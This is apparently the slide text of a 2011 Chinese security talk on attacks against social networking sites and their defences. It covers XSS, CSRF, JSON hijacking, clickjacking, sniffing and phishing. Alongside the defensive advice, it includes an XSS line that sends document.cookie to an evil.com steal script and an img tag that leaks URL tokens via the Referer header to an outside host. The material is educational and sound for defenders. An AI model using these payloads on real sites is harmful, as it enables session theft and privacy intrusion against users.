研 究 部 总 知 道 创 宇 做 这 些 事 : Web 安 全 产 品 的 核 心 技 术 研 发 Web/Web2.0 安 全 研 究 让 互 联 网 更 好 更 安 全 团 队 做 这 些 事 : Web Hacking, 分 享 在 :xeyeteam.apps

# Author: 余 弦 # Date: 2011/08/10 # Email: evilcos@gmail.com

研 究 部 总 监 @ 知 道 创 宇 做 这 些 事 : Web 安 全 产 品 的 核 心 技 术 研 发 Web/Web2.0 安 全 研 究 让 互 联 网 更 好 更 安 全 ROOT@XEYE 团 队 做 这 些 事 : Web Hacking, 分 享 在 :xeyeteam.appspot.com Hacking no area

2010/7: 邪 恶 的 SNS 攻 击 与 防 御 @HKITSSM 一 年 来 新 事 物 的 兴 起, 速 度 在 变 快, 安 全 赶 上 了 吗?!!! 2011 什 么 在 流 行?

一 理 解 SNS 二 攻 防 我 们 进 入 了 一 个 新 战 场 我 们 做 了 很 多 深 入 的 研 究, 还 在 持 续 三 愈 演 愈 烈 的 战 争 还 有 什 么 等 着 我 们 四 Q&A

Social Networking Services 社 交 网 络 : 社 会 交 往 的 虚 拟 化 这 里 说 的 SNS 包 含 那 些 具 有 SNS 性 质 的 网 站

Web2.0 技 术 与 模 式 AJAX/DHTML/mashup 混 搭 /HTML5/... 更 好 的 体 验, 更 轻 松 的 交 互 用 户 高 度 参 与 隐 私 大 量 的 隐 私 数 据 与 社 交 关 系 关 注 隐 私 控 制 策 略 社 会 关 系 虚 拟 化

信 任 关 系 Web 层 面 浏 览 器 的 同 源 策 略 嵌 入 的 第 三 方 内 容 安 全 性 用 户 层 面 依 赖 于 用 户 判 断, 可 广 大 用 户 会 判 断 吗?... 隐 私 数 据 用 户 的 身 份 认 证 password, cookies, 认 证 token DOM 页 面 里 的 隐 私 内 容 来 自 数 据 库 等

1. 隐 私 控 制 策 略 不 完 备 2. XSS 跨 站 脚 本 攻 击 3. CSRF 跨 站 请 求 伪 造 4. 点 击 劫 持 风 险 5. HTTP 明 文, 局 域 网 抓 包 6. 高 级 钓 鱼 技 术 7. 移 动 手 机 上 的 Web 安 全

泄 露 了 什 么 真 实 世 界 里 的 地 理 位 置 好 友 关 系 其 它 头 像 照 片 ( 可 能 是 真 人 ), 统 计 信 息 等 这 意 味 着

如 果 泄 露 个 人 基 本 信 息 对 于 黑 客 来 说 可 以 挖 掘 出 更 多 search engine other databases! 如 果 泄 露 了 好 友 关 系 对 于 黑 客 来 说 你 已 经 没 隐 私 了 黑 了 你 好 友 的 任 意 一 位 假 冒 你 的 好 友 SNS 里 的 社 会 工 程 学

业 务 与 安 全 的 矛 盾 为 什 么 隐 私 控 制 不 能 更 严 格 为 什 么 要 开 放 好 友 关 系 隐 私 控 制 策 略 不 应 该 偷 偷 进 行 隐 私 控 制 需 要 全 面 隐 私 控 制 也 需 要 用 户 体 验

Web 客 户 端 逻 辑 主 要 是 JavaScript ActionScript(Flash/Flex) 一 旦 出 现 XSS 注 入 恶 意 的 JavaScript 到 当 前 页 面 等 于 完 全 控 制 了 Web 客 户 端 逻 辑 等 于 任 何 隐 私 都 不 再 是 隐 私 因 为 黑 客 可 以 轻 易 盗 走 它 们 用 户 的 身 份 认 证 页 面 的 隐 私 内 容

盗 用 户 隐 私 数 据 XSS exploit 获 取 cookies new Image().src='http://www.evil.com/steal.php?data='+encodeU RIComponent(document.cookie); DOM 操 作 获 取 更 多 隐 私 数 据 document.getelementbyid('token').value;... 还 有 更 多 的 攻 击 手 法 获 取 明 文 密 码 XSS 蠕 虫 攻 击 : 新 浪 微 博 蠕 虫

原 理 : 这 些 最 新 版 本 的 浏 览 器 会 在 用 户 登 录 时 提 醒 记 录 密 码 Firefox/Chrome/IE/Opera/Safari( 默 认 不 保 存 ) 等

原 理 : XSS 可 以 这 样 获 取 到 明 文 密 码 :

more: http://xeyeteam.appspot.com/2010/12/24/xss_ste al_plain_password.html 由 于 浏 览 器 差 异, 更 多 细 节, 更 完 整 的 POC 会 单 独 发 文 公 布

一 切 输 入 都 不 可 信 进 入 数 据 库 进 入 文 件 系 统 进 入 操 作 系 统 进 入 模 块 类 甚 至 是 函 数 输 入 验 证 输 出 编 码 白 名 单 机 制 黑 名 单 机 制

cookie security [path][expires][domain][secure][httponly] 客 户 端 脚 本 无 法 获 取 到 HttpOnlycookie 仅 仅 保 护 身 份 认 证 不 被 盗 用

断 其 源 头 修 补 XSS, CSRF 等 漏 洞 业 务 逻 辑 分 离 不 同 的 业 务 逻 辑 不 应 该 在 同 一 域 下 xeyetem.appspot.com 优 于 appspot.com/xeyeteam 关 键 功 能 使 用 验 证 码 或 密 码 二 次 认 证 防 止 短 时 间 内 多 次 提 交 worm 经 常 大 批 量 post 数 据 完 善 的 用 户 举 报 与 日 志 功 能 SNS 就 是 基 于 用 户 的 日 志 辅 助 定 位 问 题 所 在

注 : 对 于 本 地 cookie,ie 下, 目 标 网 站 需 响 应 P3P 头, 才 能 成 功 进 行 CSRF 正 常 的 请 求 目 标 站 点 ( 存 在 CSRF 漏 洞 ) 伪 造 的 请 求 可 信 任 的 请 求 带 上 内 存 cookie 或 本 地 cookie 可 信 任 的 请 求 带 上 内 存 cookie 或 本 地 cookie 浏 览 器 被 攻 击 者 恶 意 站 点

能 做 许 多 事 Flash 跨 域 发 起 伪 造 的 请 求 如 果 要 获 取 数 据, 则 基 于 网 站 根 目 录 下 的 crossdomain.xml 如 果 仅 仅 是 发 起 请 求, 只 要 目 标 网 站 没 防 御 CSRF, 那 就 随 意 进 行, 而 且 很 隐 蔽 :) JSON/JS 劫 持 可 以 获 取 很 多 隐 私 数 据, 因 为 网 站 们 很 喜 欢 用 它 们 来 做 数 据 传 输 格 式 普 通 CSRF 攻 击 发 起 请 求 对 目 标 网 站 进 行 数 据 篡 改 (URL GET/ 表 单 提 交 ) 也 能 发 起 CSRF 蠕 虫 攻 击...

crossdomain.xml flash 的 跨 域 通 信 配 置 文 件 如 果 这 样 配 置 黑 客 构 造 恶 意 的 swf 文 件 用 户 登 录 qun.qq.com 后, 并 浏 览 了 这 个 swf swf 可 以 盗 取 用 户 页 面 的 隐 私 数 据 了 这 个 已 经 修 补

swfsteal:

配 置 好 crossdomain.xml

某 微 博 : http://t.xx.com/ajaxlogin.php?framelogin=0&callback=fun c 未 登 录 时 返 回 数 据 func({"result":false,"errno":"","reason":""}); 登 录 时 返 回 数 据 func({"result":true,"userinfo":{"uniqueid":"1652595727","userid":"evilcos@gm ail.com","displayname":null,"userdomain":"evilcos"}} 通 过 这 个 可 以 判 断 用 户 是 否 登 录 :) callback 参 数 值 可 自 定 义, 返 回 数 据 是 JS 内 容 格 式 如 :func(json_data) 那 么 我 们 可 以 劫 持 住 这 个 func, 执 行 func 后, 得 到 的 参 数 值 就 是 这 个 JSON_DATA 这 样 来 攻 击

攻 击 页 面 的 代 码 效 果 如 下

无 效 防 御 返 回 数 据 类 型 Content-Type 改 为 application/json 等 被 <script src= 调 用 时, 同 样 解 析 为 js 文 件 有 效 防 御 我 也 不 很 清 楚 :(, 欢 迎 讨 论 如 果 不 需 要 callback 就 可 以 去 掉 新 一 代 的 浏 览 器 已 经 不 允 许 直 接 对 JSON 对 象 进 行 劫 持 但, 也 许 有 有 效 的 绕 过 方 法 尽 可 能 不 要 将 这 些 隐 私 内 容 放 在 JSON 中...

加 Referer, 请 求 源 判 断 无 法 防 御 站 内 发 起 的 伪 造 请 求 加 token Form/AJAX 中 每 次 维 护 一 个 唯 一 token 值, 无 法 预 测 有 可 能 泄 露 JSON 数 据 泄 露 RefererURL 中 泄 露 XSS 脚 本 可 以 获 取 到 这 个 token HTML5 里 的 拖 放 劫 持 攻 击, 可 以 得 到 这 个 token:)... 加 验 证 码 最 保 险, 可 用 户 体 验 太 差 了

界 面 伪 装 (UI Redress) 的 一 种 点 击 目 标 对 象 时 ( 比 如 按 钮 链 接 等 ), 点 击 事 件 (onclick) 其 实 并 没 在 该 目 标 对 象 上 触 发, 而 是 在 一 个 看 不 见 ( 透 明 ) 的 对 象 上 触 发 可 以 执 行 删 除 操 作 传 播 蠕 虫 操 作... 黑 客 进 入 美 工 猥 琐 时 代 图 来 自 : Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites

Heart(xeyeteam) 和 我 发 现 一 种 普 遍 的 点 击 劫 持 蠕 虫 现 象 涵 盖 国 内 各 大 微 博 SNS 社 区 等, 同 样 影 响 Google Reader 等 Google 服 务 通 过 该 蠕 虫 至 少 能 传 播 恶 意 网 站 与 舆 情 信 息 更 浓 厚 的 社 工 成 分 在 里 面 来 看 过 程 截 图 漏 洞 位 置 不 方 便 公 开 Google 修 补 很 头 疼, 给 我 们 的 答 复 一 直 是 这 样 会 影 响 到 正 常 业 务, 恩, 头 疼

响 应 X-Frame-Options 头 PHP: header ("X-Frame-Options: DENY"); Frame Busting 脚 本 方 式 <style> html {display:none;} </style> <script> if(self==top){ document.documentelement.style.display='block'; }else{ top.location=self.location; } </script> 目 的 都 是 让 目 标 页 面 不 能 被 iframe 嵌 入

数 据 在 http 上 明 文 传 输 login data: username/password cookies 页 面 内 容 wifi 安 全 无 线 热 点 很 多 无 线 可 入 侵 :WEP, WPA, etc 无 线 可 钓 鱼 :Phishing AP, etc wireless lan sniffing

全 站 https 会 牺 牲 性 能 Gmail, Google Reader, QQ mail, etc login on https! password modify on https! cookie on ssl [path][expires][domain][secure][httponly]

传 统 钓 鱼 一 个 分 工 明 确 的 地 下 产 业 链 我 们 对 这 个 有 很 深 的 研 究 技 术 点 URL 重 定 向 XSS 相 似 域 名 相 似 UI... 高 级 钓 鱼 基 于 DHTML

原 生 态 的 攻 击 demo: steal password on hi.baidu.com

防 御 将 会 很 困 难 上 升 到 人 与 人 的 较 量 层 面 首 先 修 补 漏 洞 XSS, etc 完 善 的 举 报 功 能 总 有 些 用 户 会 参 与 举 报 即 时 的 公 告 提 醒 让 你 的 用 户 知 道 发 生 了 什 么 让 他 们 觉 得 你 重 视 用 户 隐 私

众 多 浏 览 器 Opera mini, Safari, IE, UCWEB, QQ, etc 页 面 渲 染 WML(WMLScript), HTML(JavaScript), etc 身 份 认 证 cookie url authentication token 其 它 是 否 支 持 flash 是 否 支 持 离 线 存 储 localstorage, local Database

危 险 的 身 份 认 证 方 式 url authentication token 每 次 登 录 生 成 一 个 唯 一 的 不 可 预 测 的 authentication token token 附 加 在 每 个 url 里 如 何 盗 取 用 户 身 份 认 证? referer eg: <img src=http://hackomega.com/steal.php/>

使 用 更 安 全 的 认 证 方 式 cookie 缺 点 : 有 些 手 机 浏 览 器 不 支 持 cookie 否 则 过 滤 吧, 一 切 可 以 带 出 referer 的 对 象 html tags: img/iframe/a/area/ css styles: background:url()/@import/moz-binding/

更 脆 弱 XSS/CSRF 等 开 始 大 量 出 现 更 简 单 的 HTTP 请 求 响 应 逻 辑 认 证 简 单 了 授 权 简 单 了 没 验 证 码 了 木 桶 原 理 里 的 那 块 短 板, 溢 出 吧 安 全...

SNS 攻 击 会 是 一 种 趋 势 很 多 有 价 值 的 数 据 为 什 么 要 攻 击 不 会 总 是 娱 乐 娱 乐 利 益 驱 动 都 有 谁 参 与 了 防 御 网 站 浏 览 器 wars 用 户 法 律

我 们 也 尽 了 一 份 力 我 们 有 近 1000W 网 站 的 数 据 中 心 让 我 们 从 全 局 角 度 上 去 统 计 分 析 这 个 Web 世 界 的 健 康 状 态 我 们 有 统 一 网 站 安 全 监 测 平 台 WebSOC 我 们 有 SAAS 网 站 安 全 监 测 服 务 scanv.com 我 们 有 云 防 火 墙 cloudwaf.com 我 们 有 专 门 针 对 Web/Web2.0 的 研 究 团 队 逐 渐 挖 掘 出 更 多 有 意 思 的 数 据 我 们 有 这 样 的 决 心, 我 们 在 持 续 产 出 与 分 享...

这 是 一 个 令 人 激 动 的 新 武 器 新 的 HTML5 标 签 元 素 新 的 JS APIs 更 强 大 的 CSS 样 式 HTML5 让 这 个 SNS 更 加 精 彩 :) 你 想 到 了 吗?

Q&A 2012? 我 们 期 待 着